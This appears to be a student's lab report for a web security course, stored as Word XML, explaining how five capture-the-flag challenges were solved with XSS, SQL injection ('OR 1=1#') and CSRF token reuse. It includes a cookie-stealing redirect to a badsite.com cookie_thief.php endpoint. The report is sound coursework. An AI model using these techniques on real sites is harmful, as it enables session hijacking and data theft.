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FFC5" w14:textId="188110E6" w:rsidR="007B5023" w:rsidRDefault="007B5023">
      <w:r>
        <w:t xml:space="preserve">Commit: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="sha"/>
        </w:rPr>
        <w:t>a5f7ae3ac2a9c92f1a462dd9e56bd7fa609bf771</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB1BB95" w14:textId="3BB1A5AF" w:rsidR="00D17594" w:rsidRDefault="00225549">
      <w:r>
        <w:t>3235 report – Web Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0934FC77" w14:textId="78904066" w:rsidR="00225549" w:rsidRDefault="00225549" w:rsidP="00225549">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The title section of the form does not escape special characters such as ‘&lt;’ or ‘&gt;’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51038A01" w14:textId="397BF755" w:rsidR="00225549" w:rsidRDefault="00225549" w:rsidP="00225549">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Thus</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by using the method taught in lecture, where using an image to conduct an xss attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CC4FD8" w14:textId="434ADC2C" w:rsidR="00225549" w:rsidRDefault="00225549" w:rsidP="00225549">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>This will be done by first creating img tag, and then since there is the &lt;br&gt; tag in the form, we can escape that tag using the ‘src’</w:t>
      </w:r>
      <w:r w:rsidR="00472484">
        <w:t xml:space="preserve"> field</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and opening it with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>“ in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the title section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3143F9E2" w14:textId="7AB8F535" w:rsidR="00225549" w:rsidRDefault="00225549" w:rsidP="00225549">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The content section will close </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the ”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> making the src of the image be “&lt;br&gt;” which will cause an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A3EABE" w14:textId="77FC482F" w:rsidR="00225549" w:rsidRDefault="00472484" w:rsidP="00225549">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Then using the onerror field, we can add the code which we want to run which in this case will be console.log(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) to print out the cookie value in the console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246A1FF3" w14:textId="7C146FBF" w:rsidR="00472484" w:rsidRDefault="00472484" w:rsidP="00472484">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is a standard SQL injection attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370FF3A4" w14:textId="2A6D9361" w:rsidR="00472484" w:rsidRDefault="00472484" w:rsidP="00472484">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Since the </w:t>
      </w:r>
      <w:r w:rsidR="007954AD">
        <w:t xml:space="preserve">user input is directly used in the SQL query, we can escape the SQL query with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007954AD">
        <w:t>‘ and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007954AD">
        <w:t xml:space="preserve"> then inject our own inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BBA8A9" w14:textId="45D5C32F" w:rsidR="007954AD" w:rsidRDefault="007954AD" w:rsidP="00472484">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>This will make the query look like SELECT voucher from table2 WHERE id=’1’</w:t>
      </w:r>
      <w:r w:rsidR="00BE28CF">
        <w:t xml:space="preserve"> OR 1=1#’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ADB2FF" w14:textId="24F2DC3F" w:rsidR="00BE28CF" w:rsidRDefault="00BE28CF" w:rsidP="00472484">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>This will make the entire query compare against 1=1 which equates to true, and hence will print out the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F81DDA" w14:textId="53244FB5" w:rsidR="00BE28CF" w:rsidRDefault="00BE28CF" w:rsidP="00BE28CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Case03.php uses the same CSRF token for all requests, the aim would be to send a post request to case03.php using that CSRF token to get the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3312C1B9" w14:textId="09BEF2B4" w:rsidR="00BE28CF" w:rsidRDefault="00BE28CF" w:rsidP="00BE28CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In badsite.com/case03.html we require the page to automatically </w:t>
      </w:r>
      <w:r w:rsidR="00D72DFB">
        <w:t xml:space="preserve">post </w:t>
      </w:r>
      <w:r>
        <w:t>the form data we crafted to case03.php</w:t>
      </w:r>
      <w:r w:rsidR="00D72DFB">
        <w:t xml:space="preserve"> with the same csrf token. This will be taken as true in case03.php and hence print out the flag in the console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D719271" w14:textId="6C5E24DB" w:rsidR="00D72DFB" w:rsidRDefault="00D72DFB" w:rsidP="00D72DFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This challenge is to use the vulnerable case04/404.php code </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B8E861" w14:textId="645F5AC7" w:rsidR="00D72DFB" w:rsidRDefault="00D72DFB" w:rsidP="00D72DFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The 404.php code will attempt to urldecode our requested url without sanitization, allowing us to use script </w:t>
      </w:r>
      <w:r w:rsidR="00D62D37">
        <w:t>code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392A7AD5" w14:textId="501A5E43" w:rsidR="00D62D37" w:rsidRDefault="00D62D37" w:rsidP="00D72DFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hence, using the the script to first get the user cookie, then concatenate along </w:t>
      </w:r>
      <w:r w:rsidR="00AF1365">
        <w:t xml:space="preserve">with the already provided cookie_thief.php in badsite, we will create a site of </w:t>
      </w:r>
      <w:r w:rsidR="00AF1365" w:rsidRPr="00DE6DDB">
        <w:t>http://www.badsite.com/cookie_thief.php?cookie=USER_COOKIE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BC2FF7" w14:textId="2FC5E40F" w:rsidR="00AF1365" w:rsidRDefault="00DE6DDB" w:rsidP="00D72DFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CA4933">
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CA4933">
        <w:t>, we are then able to immediately go to cookie_thief.php with the right cookie and get the flag printed in the console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CACF8A" w14:textId="1F40B466" w:rsidR="001B26F1" w:rsidRDefault="001B26F1" w:rsidP="001B26F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>This requires us to use xss to move from case05/index.php to case05/delete.php and pass the checks to get the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1055621B" w14:textId="7A97B03D" w:rsidR="001B26F1" w:rsidRDefault="001B26F1" w:rsidP="001B26F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Thus</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> using XMLHttpRequest to simulate a GET request to delete.php to first capture the csrf token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28511257" w14:textId="447E6595" w:rsidR="001B26F1" w:rsidRDefault="001B26F1" w:rsidP="001B26F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Then after getting that, we will then use that token to send a post request to delete.php which will then echo the flag out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400BCD93" w14:textId="19EF10AC" w:rsidR="001B26F1" w:rsidRDefault="001B26F1" w:rsidP="001B26F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With some </w:t>
      </w:r>
      <w:r w:rsidR="00490DCB">
        <w:t xml:space="preserve">string slicing, we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00490DCB">
        <w:t>are able to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00490DCB">
        <w:t xml:space="preserve"> cut out the flag portion on the site itself</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001B26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055A" w14:textId="77777777" w:rsidR="00B85104" w:rsidRDefault="00B85104" w:rsidP="00225549">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="17FACF0D" w14:textId="77777777" w:rsidR="00B85104" w:rsidRDefault="00B85104" w:rsidP="0022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DCE0" w14:textId="77777777" w:rsidR="00B85104" w:rsidRDefault="00B85104" w:rsidP="00225549">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="442EC061" w14:textId="77777777" w:rsidR="00B85104" w:rsidRDefault="00B85104" w:rsidP="0022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A3B8A" w14:textId="3CD59BA4" w:rsidR="00225549" w:rsidRDefault="00225549">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>A0216695U Ng Jong Ray, Edward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4F92"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09E6014C"/>
    <w:lvl w:ilvl="0" w:tplc="570E4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49"/>
    <w:rsid w:val="001B26F1"/>
    <w:rsid w:val="00225549"/>
    <w:rsid w:val="00472484"/>
    <w:rsid w:val="00490DCB"/>
    <w:rsid w:val="007954AD"/>
    <w:rsid w:val="007B5023"/>
    <w:rsid w:val="00AF1365"/>
    <w:rsid w:val="00B85104"/>
    <w:rsid w:val="00BE28CF"/>
    <w:rsid w:val="00CA4933"/>
    <w:rsid w:val="00D17594"/>
    <w:rsid w:val="00D62D37"/>
    <w:rsid w:val="00D72DFB"/>
    <w:rsid w:val="00DE6DDB"/>
    <w:rsid w:val="00E3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B3B9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AD56B455-B81C-4498-9F50-9ACE15B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49"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00225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49"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00225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65"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sha">
    <w:name w:val="sha"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="007B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D6388BD9FE498B20B422CBF1CB3E" ma:contentTypeVersion="7" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="77072ae24caf2203c8cac7fb606e015a">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="2d8febc3-0fe3-48b0-8309-bb8bd0c91d3e" xmlns:ns4="010aafb9-c478-4654-88e6-117a08ce3164" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="339ca439cd156d7cf30c770afa123e1e" ns3:_="" ns4:_="">
    <xsd:import namespace="2d8febc3-0fe3-48b0-8309-bb8bd0c91d3e"/>
    <xsd:import namespace="010aafb9-c478-4654-88e6-117a08ce31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febc3-0fe3-48b0-8309-bb8bd0c91d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aafb9-c478-4654-88e6-117a08ce3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631DA-1B1C-4A7A-9F94-CE099B3C5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febc3-0fe3-48b0-8309-bb8bd0c91d3e"/>
    <ds:schemaRef ds:uri="010aafb9-c478-4654-88e6-117a08ce3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C6453B-837A-460F-AFAA-933126982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EB3A3-2A0D-46A1-9CEC-FD31E3A561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Jong Ray, Edward</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ng Jong Ray, Edward</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-13T16:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-22T14:14:00Z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0x0101005558D6388BD9FE498B20B422CBF1CB3E</vt:lpwstr>
  </property>
</Properties>
</file>